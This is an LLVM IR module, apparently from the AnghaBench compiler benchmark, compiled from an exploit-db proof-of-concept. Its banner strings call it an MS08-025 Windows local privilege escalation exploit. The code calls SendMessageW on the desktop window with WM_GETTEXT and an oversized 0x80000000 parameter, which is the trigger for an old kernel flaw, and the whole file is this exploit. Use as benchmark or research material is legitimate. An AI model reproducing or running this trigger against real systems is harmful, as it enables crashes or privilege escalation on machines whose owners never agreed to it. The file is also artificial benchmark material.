; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_31585.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_31585.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [66 x i8] c"\09MS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\0A\0A\00", align 1
@.str.1 = private unnamed_addr constant [62 x i8] c"Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\0A\00", align 1
@WM_GETTEXT = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 -2147483648, i32* %6, align 4
  %7 = call i32 @printf(i8* getelementptr inbounds ([66 x i8], [66 x i8]* @.str, i64 0, i64 0))
  %8 = call i32 @printf(i8* getelementptr inbounds ([62 x i8], [62 x i8]* @.str.1, i64 0, i64 0))
  %9 = call i32 (...) @GetDesktopWindow()
  %10 = load i32, i32* @WM_GETTEXT, align 4
  %11 = load i32, i32* %6, align 4
  %12 = call i32 @SendMessageW(i32 %9, i32 %10, i32 -2147483648, i32 %11)
  ret i32 0
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @SendMessageW(i32, i32, i32, i32) #1

declare dso_local i32 @GetDesktopWindow(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
